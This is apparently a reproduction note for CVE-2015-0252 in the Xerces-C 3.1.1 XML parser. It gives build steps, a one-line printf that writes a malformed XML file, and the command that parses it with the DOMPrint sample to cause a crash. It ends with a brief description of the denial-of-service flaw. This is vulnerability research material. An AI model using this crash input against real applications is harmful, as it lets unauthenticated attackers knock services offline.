INSTALL & Configuration
wget https://github.com/mudongliang/source-packages/raw/master/CVE-2015-0252/xerces-c-3.1.1.tar.gz tar -xvf xerces-c-3.1.1.tar.gz cd xerces-c-3.1.1 ./configure make
Problems in Installation & Configuration
How to trigger vulnerability
printf "\xff\xfe\x00\x00\x3c" > file.xml ./samples/DOMPrint ./file.xml
Vulnerability Details & Patch
The Xerces-C XML parser mishandles certain kinds of malformed input documents, resulting in a segmentation fault during a parse operation. The bug does not appear to allow for remote code execution, but is a denial of service attack that in many applications may allow for an unauthenticated attacker to supply malformed input and cause a crash.